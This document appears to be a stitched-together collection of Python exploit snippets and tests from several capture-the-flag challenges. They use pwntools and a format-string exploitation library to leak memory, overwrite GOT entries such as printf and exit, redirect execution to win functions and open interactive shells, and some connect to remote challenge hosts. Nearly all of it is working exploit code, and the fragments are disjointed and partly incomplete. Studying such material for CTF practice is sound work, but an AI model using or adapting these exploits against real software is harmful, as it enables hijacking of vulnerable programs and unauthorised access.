def test_win(): winner = 0x4008DA connect() fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False) fmtStr.write_q(elf.symbols['got.printf'], winner) p.sendline("2") p.sendline("") out = p.recvline() assert "This_is_the_flag" in out
def startIt(): global p global fmtStr p = process(os.path.join(SCRIPTDIR, fName), buffer_fill_size=0xffff) p.recvuntil("Input: ") fmtStr = FormatString(exec_fmt, elf=elf)
import IPython import logging logging.basicConfig(level=logging.DEBUG) log = logging.getLogger() fName = "./deardiary" elf = ELF(fName) # For deardiary def exec_fmt(s): global p p = process(fName, buffer_fill_size=0xffff) p.recvuntil("quit") p.sendline("1") p.sendline(s) p.recvuntil("quit") p.sendline("2") p.recvuntil(">") out = p.recvuntil("1.", drop=True) p.recvuntil("quit") p.close() return out fmtStr = FormatString(exec_fmt, elf=elf) print(fmtStr.leak.s(elf.symbols['data']))
context.binary = elf def connect(): global p p = process(elf.file.name) #p = remote("146.185.132.36",19153) p.recvuntil("Exit the battle \n") def exec_fmt(s): print("Sending: " + repr(s)) p.sendline("2") sleep(0.1) p.sendline(s) ret = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True) p.recvuntil("Exit the battle \n") return ret winner = 0x4008DA connect() fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False) fmtStr.write_q(elf.symbols['got.printf'], winner) p.sendline("2") p.interactive()
def test_it(): fmtStr = FormatString(exec_fmt, elf=elf) assert fmtStr[elf.symbols['secret']] == 'This is my super secret string!' assert fmtStr[elf.symbols['loggedIn']] == "\x00"
#!/usr/bin/env python from formatStringExploiter.FormatString import FormatString from pwn import * def exec_fmt(s, echo=True): # Open up pwntool process class to interact with application p = process("./hacker_level", buffer_fill_size=0xffff) # Go ahead and send our input p.sendline(s) # Throw out data that we know to be before our results p.recvuntil("Hello, ", drop=True) # We could do better here, but why? Just grab all the rest of the data. out = p.recvall() # For diagnostic reasons, we can print out the output if echo: print(out) # Since we're running this every time, close out the proc. p.close() return out elf = ELF("./hacker_level") fmtStr = FormatString(exec_fmt, elf=elf) fmtStr.write_d(elf.symbols['level'], 0xCCC31337)
# print elf print(hex(elf.got['exit'])) get_secret = 0x08048713 print hex(get_secret) def exec_fmt(s): p = elf.process() # p =remote('problem1.tjctf.org',8008) p.recv() password = '******' p.sendline(password) p.recv() p.sendline(s) p.recvuntil('> ', drop=True) p.sendline(password) out = p.recvuntil('\n\nTada!', drop=True) print p.recvall() return out fmtStr = FormatString(exec_fmt,elf=elf, explore_stack=False) # fmtStr.printStack() fmtStr.write_d(elf.got['exit'], get_secret + 65537)
#!/usr/bin/env python from formatStringExploiter.FormatString import FormatString from pwn import * import IPython def exec_fmt(s): global p print("executing: " + repr(s)) # Open up pwntool process class to interact with application p = process(["./fermat", s], buffer_fill_size=0xffff) # Get the output out = p.recvall() return out elf = ELF("./fermat") fmtStr = FormatString(exec_fmt, elf=elf) fmtStr.write_word(elf.symbols['secret'], 0x539) IPython.embed()
def test_it(): fmtStr = FormatString(exec_fmt, elf=elf) assert fmtStr.leak.s( elf.symbols['secret']) == b'This is my super secret string!' assert fmtStr.leak.b(elf.symbols['loggedIn']) == 0
from formatStringExploiter.FormatString import FormatString elf = ELF('./secure') print(hex(elf.got['exit'])) get_secret = 0x08048713 print hex(get_secret) def exec_fmt(s): p = elf.process() print("executing: " + repr(s)) # p = remote('problem1.tjctf.org',8008) p.recv() password = '******' p.sendline(password) p.recv() p.sendline(s) p.recvuntil('> ', drop=True) p.sendline(password) out = p.recvuntil('\n\nTada!', drop=True) print p.recvall() return out fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False) print fmtStr.write_d(elf.got['exit'], get_secret + 0x10001)
#p=process('mary_morton') p = remote("111.198.29.45", 44435) elf = ELF('mary_morton') libc = ELF('libc-2.23.so') context.clear(arch='amd64') taraddr = 0x4008da print_addr = elf.got['printf'] print "printf_addr:" + hex(print_addr) print p.recv() def exec_fmt(s): p.sendline('2') sleep(0.1) p.sendline(s) ret = p.recvuntil('1. ', drop=True) return ret #print fmt('aaaa') fmt = FormatString(exec_fmt, elf=elf, index=6) fmt.write_qword(print_addr, taraddr) print p.recv() p.sendline('1') p.interactive() #print offset
def remote_atk(pl): with remote('163.172.176.29', 9035) as p: p.recvuntil('pwner, whats your name?\n') p.sendline(pl) p.recvuntil('Till then Bye') p.interactive() #fmtStr = FormatString(exec_fmt, elf=elf) # index = 10 # pad = 0 # {'max_explore': 64, 'already_written': 1, 'index': 10, 'arch': 'i386', 'bad_chars': '\n', 'elf': ELF('/media/sd128/sdcard/ctf/backdoor/32_new'), 'leak': pwnlib.memleak.MemLeak(<bound method FormatString._leak of <formatStringExploiter.FormatString.FormatString instance at 0x7f9a4db16bd8>>, search_range=20, reraise=True), 'pad': 0, 'endian': 'little', 'padChar': 'C', 'bits': 32, 'stack': [0, 134514964, 4287639208, 1, 4148418072, 878, 4148127336, 4288161396, 4294223700, 4294281328, 1246382666, 607203621, 1246382704, 134220362, 4148590104, 725871085, 4147803752, 4148010770, 22683471, 4291817104, 4292129648, 878, 4151142496, 0, 4294967295, 4151212128, 4149479868, 4151994464, 0, 0, 6, 4151131424, 4152049433, 0, 4152130256, 4292899208, 4290620128, 4151290523, 134513148, 4293949144, 4151720564, 2, 4152046640, 1, 0, 1, 4152199448, 4151566800, 4151689224, 4151902848, 4151410696, 4294738648, 4151880780, 4151888258, 4151115784, 0, 4152123392, 4152051992, 4292519760, 134513630, 1663069007, 745303919, 1869574944, 1702305902], 'exec_fmt': <function exec_fmt at 0x7f9a50914230>} # print vars(fmtStr) # 0x84a8751 # 0x804870b flag = elf.symbols['_Z4flagv'] #flag = 0x7be86c5 # 0x61a761a7 print hex(flag) exit_got = elf.symbols['got.exit'] print hex(exit_got) printf_plt = elf.symbols['got.printf'] print hex(printf_plt) #payload = fmtstr_payload(10, {exit_got: flag}) # attack(payload) payload = FormatString(attack, elf=elf, index=10, explore_stack=False) payload.write_q(exit_got, flag)